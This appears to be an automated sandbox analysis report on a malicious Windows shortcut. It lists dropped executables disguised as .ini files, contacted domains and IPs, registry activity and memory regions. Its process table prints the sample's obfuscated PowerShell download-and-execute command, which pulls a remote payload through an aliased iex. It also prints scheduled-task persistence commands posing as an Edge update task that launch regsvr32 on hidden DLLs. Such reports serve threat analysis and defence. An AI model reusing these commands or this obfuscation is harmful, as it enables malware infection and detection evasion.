Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
rpQF1aDIK4.lnk
|
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=19,
ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
|
initial sample
|
||
C:\Users\Public\ajbs50ul.bat
|
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\miEk.ini
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\u0ow.ini
|
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\Users\user\Desktop\utox_x86_x64.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\regsvr32.EXE.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0d1e1ns5.xlc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1uojmcjy.mki.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4lup0svj.sl1.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3hct0mt.ldv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfnxvhbx.p4k.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1slj341.abj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdfycxle.dwb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qmm3eqyj.jca.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rlvkgjf4.1hw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvw4j1q2.1op.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\second_data_temp.zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
C:\Users\user\AppData\Roaming\Tox\tox_save.tox
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Tox\utox_save.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Tox\utox_save.in~
|
Generic INItialization configuration [interface]
|
dropped
|
There are 11 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl
syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'',
''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'',
''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
|
||
C:\Users\Public\ajbs50ul.bat
|
"C:\Users\Public\ajbs50ul.bat"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/miEk.ini\")
-Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName
'MicrosoftEdgeUpdateTaskMachineUA{808CCC00-48CC-4040-C488-C044888CCCC0}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet
-AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
|
||
C:\Windows\System32\regsvr32.exe
|
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/miEk.ini
|
||
C:\Users\user\Desktop\utox_x86_x64.exe
|
"C:\Users\user\Desktop\utox_x86_x64.exe"
|
||
C:\Windows\System32\OpenWith.exe
|
"C:\Windows\system32\openwith.exe"
|
||
C:\Windows\System32\regsvr32.exe
|
"regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/miEk.ini
|
||
C:\Program Files\Windows Media Player\wmpshare.exe
|
"C:\Program Files\Windows Media Player\wmpshare.exe"
|
||
C:\Windows\System32\dllhost.exe
|
"C:\Windows\system32\dllhost.exe"
|
||
C:\Windows\System32\rekeywiz.exe
|
"C:\Windows\system32\rekeywiz.exe"
|
||
C:\Windows\System32\rekeywiz.exe
|
"C:\Windows\system32\rekeywiz.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/u0ow.ini\")
-Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName
'MicrosoftEdgeUpdateTaskMachineUA{C88C8848-C040-4888-C800-C800848C4848}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet
-AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
|
||
C:\Windows\System32\regsvr32.exe
|
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/u0ow.ini
|
||
C:\Windows\System32\regsvr32.exe
|
"regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/u0ow.ini
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 8 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://go.micro
|
unknown
|
||
https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm
|
|||
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
https://1h982d.bemostake.space
|
unknown
|
||
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
https://1h982d.bp24mostakp24.spacp24/tp24st.txt
|
unknown
|
||
https://www.ecosia.org/newtab/
|
unknown
|
||
https://rocketdocs.lol/utox_x86.exe
|
188.114.96.3
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
https://rocketdocs.lol
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://bemostake.space/test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe
|
188.114.96.3
|
||
http://rocketdocs.lol
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://www.microsoft.c
|
unknown
|
||
http://bemostake.space
|
unknown
|
||
https://bemostake.space
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://1h982d.bemostake.space/test.txt
|
188.114.96.3
|
||
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
||
http://1h982d.bemostake.space
|
unknown
|
There are 25 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
bemostake.space
|
188.114.96.3
|
||
1h982d.bemostake.space
|
188.114.96.3
|
||
rocketdocs.lol
|
188.114.96.3
|
||
s-part-0017.t-0009.t-msedge.net
|
13.107.246.45
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.168.2.9
|
unknown
|
unknown
|
||
46.29.238.96
|
unknown
|
Russian Federation
|
||
147.45.126.71
|
unknown
|
Russian Federation
|
||
104.223.122.15
|
unknown
|
United States
|
||
185.196.9.174
|
unknown
|
Switzerland
|
||
195.93.190.6
|
unknown
|
Ukraine
|
||
192.168.2.8
|
unknown
|
unknown
|
||
104.233.104.126
|
unknown
|
Saudi Arabia
|
||
148.251.23.146
|
unknown
|
Germany
|
||
192.168.2.7
|
unknown
|
unknown
|
||
163.172.136.118
|
unknown
|
United Kingdom
|
||
95.215.44.78
|
unknown
|
Latvia
|
||
193.124.186.205
|
unknown
|
Russian Federation
|
||
192.168.2.5
|
unknown
|
unknown
|
||
8.8.8.8
|
unknown
|
United States
|
||
37.97.185.116
|
unknown
|
Netherlands
|
||
130.133.110.14
|
unknown
|
Germany
|
||
194.249.212.109
|
unknown
|
Slovenia
|
||
136.243.141.187
|
unknown
|
Germany
|
||
37.187.122.30
|
unknown
|
France
|
||
185.14.30.213
|
unknown
|
Ukraine
|
||
185.58.206.164
|
unknown
|
Russian Federation
|
||
51.254.84.212
|
unknown
|
France
|
||
80.87.193.193
|
unknown
|
Russian Federation
|
||
46.229.52.198
|
unknown
|
Ukraine
|
||
205.185.116.116
|
unknown
|
United States
|
||
85.21.144.224
|
unknown
|
Russian Federation
|
||
188.114.96.3
|
bemostake.space
|
European Union
|
||
192.168.2.255
|
unknown
|
unknown
|
||
198.98.51.198
|
unknown
|
United States
|
There are 20 hidden IPs, click here to show them.
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\SibCode
|
sn2
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum 64-bit
|
Version
|
There are 6 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85F6000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
1B570000
|
direct allocation
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85F9000
|
heap
|
page read and write
|
||
22BF85FC000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
1B790000
|
direct allocation
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85F9000
|
heap
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF57D0000
|
direct allocation
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FA000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FC000
|
heap
|
page read and write
|
||
22BF85FC000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85F1000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85F5000
|
heap
|
page read and write
|
||
22BF85FA000
|
heap
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85F6000
|
heap
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
1BC61000
|
direct allocation
|
page execute and read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85F8000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85F4000
|
heap
|
page read and write
|
||
22BF85F8000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF8501000
|
heap
|
page read and write
|
||
22BF85FB000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85F9000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
22BF85FD000
|
heap
|
page read and write
|
||
1BF81000
|
direct allocation
|
page execute and read and write
|
||
22BF8534000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
7FF887AFC000
|
trusted library allocation
|
page execute and read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
1AADAE7C000
|
unkown
|
page read and write
|
||
7FF887C40000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887BD1000
|
trusted library allocation
|
page read and write
|
||
1B4A0000
|
trusted library allocation
|
page read and write
|
||
206E000
|
stack
|
page read and write
|
||
1AA73000
|
trusted library allocation
|
page read and write
|
||
2746C421000
|
trusted library allocation
|
page read and write
|
||
2730000
|
trusted library allocation
|
page read and write
|
||
22BF79F9000
|
heap
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
7FF887ACC000
|
trusted library allocation
|
page execute and read and write
|
||
1B0103BA000
|
trusted library allocation
|
page read and write
|
||
22BF85F5000
|
heap
|
page read and write
|
||
1B000D4C000
|
trusted library allocation
|
page read and write
|
||
7DF43188A000
|
unkown
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
2921000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
23D20DF0000
|
unkown
|
page read and write
|
||
2BC0000
|
trusted library allocation
|
page read and write
|
||
2944000
|
heap
|
page read and write
|
||
2696000
|
trusted library allocation
|
page read and write
|
||
22BF7A2F000
|
heap
|
page read and write
|
||
1C640000
|
unkown
|
page read and write
|
||
597C000
|
heap
|
page read and write
|
||
7FF887DD8000
|
trusted library allocation
|
page read and write
|
||
24A2E341000
|
heap
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
22BF85F5000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
7FF887AF6000
|
trusted library allocation
|
page execute and read and write
|
||
1AC00000
|
trusted library allocation
|
page read and write
|
||
7FF887B40000
|
trusted library allocation
|
page execute and read and write
|
||
1B000572000
|
trusted library allocation
|
page read and write
|
||
23D22A25000
|
heap
|
page read and write
|
||
1CB5B3CC000
|
trusted library allocation
|
page read and write
|
||
2745A84A000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
2A5A9390000
|
heap
|
page read and write
|
||
7DF431886000
|
unkown
|
page read and write
|
||
22BF7A9A000
|
heap
|
page read and write
|
||
1ACA4000
|
heap
|
page read and write
|
||
22BF8534000
|
heap
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
1E8E000
|
stack
|
page read and write
|
||
22BF7A10000
|
heap
|
page read and write
|
||
1FF9000
|
heap
|
page read and write
|
||
22BF7A00000
|
heap
|
page read and write
|
||
7EB000
|
stack
|
page read and write
|
||
1B570000
|
trusted library allocation
|
page read and write
|
||
1AA70000
|
remote allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
22BF7C2D000
|
heap
|
page read and write
|
||
7FF887A7C000
|
trusted library allocation
|
page execute and read and write
|
||
23D20FFF000
|
unkown
|
page read and write
|
||
D2F000
|
heap
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1CB636D8000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1AA60000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
7FF7178DB000
|
unkown
|
page write copy
|
||
1BA83000
|
trusted library allocation
|
page read and write
|
||
22BF7A99000
|
heap
|
page read and write
|
||
1AF00000
|
trusted library allocation
|
page read and write
|
||
1ADAE000
|
heap
|
page read and write
|
||
23D20D5F000
|
unkown
|
page execute and read and write
|
||
22BF7E10000
|
heap
|
page read and write
|
||
27E0000
|
heap
|
page read and write
|
||
AF0000
|
heap
|
page read and write
|
||
FD0000
|
heap
|
page readonly
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
A70903B000
|
stack
|
page read and write
|
||
7DF47D800000
|
trusted library allocation
|
page execute and read and write
|
||
1C6F8000
|
unkown
|
page read and write
|
||
22BF8574000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
22BF7FD8000
|
heap
|
page read and write
|
||
7FF887D60000
|
trusted library allocation
|
page read and write
|
||
23F8000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7C0D000
|
heap
|
page read and write
|
||
1AA73000
|
trusted library allocation
|
page read and write
|
||
1AB63000
|
trusted library allocation
|
page read and write
|
||
1ACAB000
|
heap
|
page read and write
|
||
22BF7C40000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7A99000
|
heap
|
page read and write
|
||
1B7A0000
|
heap
|
page execute and read and write
|
||
1B550000
|
trusted library allocation
|
page read and write
|
||
F25DB7E000
|
stack
|
page read and write
|
||
22BF7C58000
|
heap
|
page read and write
|
||
2725000
|
trusted library allocation
|
page read and write
|
||
7FF887CE0000
|
trusted library allocation
|
page read and write
|
||
1CB495D0000
|
trusted library allocation
|
page read and write
|
||
1C6FB000
|
unkown
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
2745A7A0000
|
heap
|
page read and write
|
||
1B550000
|
trusted library allocation
|
page read and write
|
||
44D2CBF000
|
stack
|
page read and write
|
||
1BA70000
|
trusted library allocation
|
page read and write
|
||
10D3000
|
heap
|
page read and write
|
||
22BF7C4F000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
2E10000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
22BF85ED000
|
heap
|
page read and write
|
||
1B51C000
|
stack
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1B9B8000
|
heap
|
page read and write
|
||
22BF7C2C000
|
heap
|
page read and write
|
||
23D210D0000
|
heap
|
page read and write
|
||
1AA67000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
2A8F000
|
stack
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1035000
|
heap
|
page read and write
|
||
1B018C13000
|
heap
|
page read and write
|
||
672D000
|
stack
|
page read and write
|
||
1AC11000
|
heap
|
page read and write
|
||
2745C1D0000
|
trusted library allocation
|
page read and write
|
||
22BF7C08000
|
heap
|
page read and write
|
||
1BA90000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AE30000
|
trusted library allocation
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
59FC000
|
heap
|
page read and write
|
||
7FF887BF0000
|
trusted library allocation
|
page execute and read and write
|
||
1CB63557000
|
heap
|
page execute and read and write
|
||
1C8F6000
|
unkown
|
page read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
7FF887A43000
|
trusted library allocation
|
page execute and read and write
|
||
1B010633000
|
trusted library allocation
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF7A3C000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
1E879E10000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7C0F000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
7FF887AD6000
|
trusted library allocation
|
page read and write
|
||
1B001E4B000
|
trusted library allocation
|
page read and write
|
||
22BF7A3F000
|
heap
|
page read and write
|
||
22BF7A99000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
1B8A0000
|
trusted library allocation
|
page read and write
|
||
22BF7C3D000
|
heap
|
page read and write
|
||
22BF85F5000
|
heap
|
page read and write
|
||
1BA90000
|
trusted library allocation
|
page read and write
|
||
22BF58B1000
|
heap
|
page read and write
|
||
22BF7C58000
|
heap
|
page read and write
|
||
7FF887D70000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
CE5000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
1B470000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7FD8000
|
heap
|
page read and write
|
||
7FF887D90000
|
trusted library allocation
|
page read and write
|
||
1B07E200000
|
heap
|
page read and write
|
||
7FF887B2C000
|
trusted library allocation
|
page execute and read and write
|
||
22BF7C28000
|
heap
|
page read and write
|
||
1B770000
|
trusted library allocation
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
1AB61000
|
trusted library allocation
|
page read and write
|
||
1B690000
|
trusted library section
|
page read and write
|
||
7FF887BA0000
|
trusted library allocation
|
page execute and read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF7A9A000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF5897000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
24A2E241000
|
heap
|
page read and write
|
||
2745A7C0000
|
heap
|
page read and write
|
||
7FF8DEFFF000
|
unkown
|
page read and write
|
||
22BF7A99000
|
heap
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
A708E37000
|
stack
|
page read and write
|
||
1BBC0000
|
trusted library allocation
|
page read and write
|
||
1AA80000
|
trusted library allocation
|
page read and write
|
||
27474980000
|
heap
|
page read and write
|
||
1B560000
|
trusted library allocation
|
page read and write
|
||
2A5A900C000
|
unkown
|
page read and write
|
||
22BF85F4000
|
heap
|
page read and write
|
||
1AADAE21000
|
unkown
|
page execute read
|
||
22BF7C0F000
|
heap
|
page read and write
|
||
5D9000
|
heap
|
page read and write
|
||
5978000
|
heap
|
page read and write
|
||
1B018AA0000
|
heap
|
page read and write
|
||
7FF887A3D000
|
trusted library allocation
|
page execute and read and write
|
||
1B990000
|
trusted library allocation
|
page read and write
|
||
598A000
|
heap
|
page read and write
|
||
1AA70000
|
remote allocation
|
page read and write
|
||
1AC51000
|
heap
|
page read and write
|
||
22BF859C000
|
heap
|
page read and write
|
||
27474B68000
|
heap
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
7FF887C54000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF859C000
|
heap
|
page read and write
|
||
1ED0000
|
trusted library allocation
|
page read and write
|
||
1BB50000
|
trusted library allocation
|
page read and write
|
||
1BB14000
|
trusted library allocation
|
page read and write
|
||
1B500000
|
trusted library allocation
|
page read and write
|
||
1AADAFC5000
|
heap
|
page read and write
|
||
22BF8534000
|
heap
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
2745A9B0000
|
heap
|
page read and write
|
||
BF0000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
2A5A9108000
|
heap
|
page read and write
|
||
22BF85A4000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF7C37000
|
heap
|
page read and write
|
||
1AEB0000
|
trusted library allocation
|
page read and write
|
||
22BF7C73000
|
heap
|
page read and write
|
||
2963000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
2745D17F000
|
trusted library allocation
|
page read and write
|
||
1B540000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF7C37000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
F25D6DC000
|
stack
|
page read and write
|
||
1B78C000
|
trusted library allocation
|
page read and write
|
||
22BF7C27000
|
heap
|
page read and write
|
||
23D22970000
|
heap
|
page read and write
|
||
22BF7A40000
|
heap
|
page read and write
|
||
22BF7C0F000
|
heap
|
page read and write
|
||
22BF7C58000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
2CE0000
|
trusted library section
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
